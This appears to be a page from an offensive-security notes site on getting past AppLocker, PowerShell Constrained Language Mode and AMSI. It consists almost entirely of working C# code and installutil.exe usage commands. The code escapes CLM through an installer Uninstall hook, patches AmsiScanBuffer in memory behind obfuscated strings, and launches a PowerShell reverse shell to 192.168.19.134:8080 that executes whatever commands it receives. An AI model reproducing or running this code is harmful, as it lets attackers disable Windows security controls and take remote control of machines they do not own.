AppLocker

Bypass CLM and Applocker

using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Configuration.Install;
using System.Collections.ObjectModel;

namespace Bypass
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("Bypassing CLM");
        }
    }

    [System.ComponentModel.RunInstaller(true)]
    public class Sample : System.Configuration.Install.Installer
    {
        public override void Uninstall(System.Collections.IDictionary savedState)
        {
            Runspace rs = RunspaceFactory.CreateRunspace();
            rs.Open();

            PowerShell ps = PowerShell.Create();
            ps.Runspace = rs;

            String cmd = "$ExecutionContext.SessionState.LanguageMode";
            ps.AddScript(cmd);

            Collection<PSObject> output = ps.Invoke();
            foreach (PSObject o in output)
            {
                Console.WriteLine(o.ToString());
            }
            rs.Close();
        }
    }
}

Compiled and execute

C:\>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\BypassCLM.exe
Microsoft (R) .NET Framework Installation utility Version 4.8.4084.0
Copyright (C) Microsoft Corporation.  All rights reserved.

FullLanguage

C:\>

Bypass AMSI + CLM + AppLocker

GitHub - vulnableone/BypassX: The Swiss army knife of evasion tool that bypasses AMSI, Applocker, and CLM mode simultaneously.GitHub

using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Configuration.Install;
using System.Runtime.InteropServices;

namespace Bypass
{
    class Program
    {

        [DllImport("kernel32")]
        public static extern IntPtr LoadLibrary(string name);

        [DllImport("kernel32")]
        public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

        [DllImport("kernel32")]
        public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

        static void Main(string[] args)
        {
            Console.WriteLine("Bypassing CLM");
        }

        public static int bypassAMSI()
        {
            char[] chars = { 'A', 'm', 's', 'i', 'S', 'c', 'a', 'n', 'B', 'u', 'f', 'f', 'e', 'r' };
            String funcName = string.Join("", chars);

            char[] chars2 = { 'a', 'm', 's', 'i', '.', 'd', 'l', 'l' };
            String libName = string.Join("", chars2);

            IntPtr Address = GetProcAddress(LoadLibrary(libName), funcName);

            Byte[] Patchx64 = new byte[] { 0xb8, 0x34, 0x12, 0x07, 0x80, 0x66, 0xb8, 0x32, 0x00, 0xb0, 0x57, 0xc3 };

            uint p = 0;

            VirtualProtect(Address, (UIntPtr)3, 0x40, out p);
            Marshal.Copy(Patchx64, 0, Address, 12);


            return 0;
        }
    }

    [System.ComponentModel.RunInstaller(true)]
    public class Sample : System.Configuration.Install.Installer
    {
        public override void Uninstall(System.Collections.IDictionary savedState)
        {
            Program.bypassAMSI();
            using (PowerShell ps = PowerShell.Create())
            {

                string commmand = @"$client = New-Object System.Net.Sockets.TCPClient('192.168.19.134',8080);
                                    $stream = $client.GetStream();
                                    [byte[]]$bytes = 0..65535|%{0};
                                    while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
                                    {
                                        $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
                                        $sendback = (iex $data 2>&1 | Out-String );
                                        $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
                                        $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
                                        $stream.Write($sendbyte,0,$sendbyte.Length);
                                        $stream.Flush();
                                    }
                                    $client.Close();";

                ps.AddScript(commmand);
                ps.Invoke();
            }
        }
    }
}

Usage:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U BypassX.exe

PreviousCLM NextUse Alternate Authentication Material

Last updated 1 year ago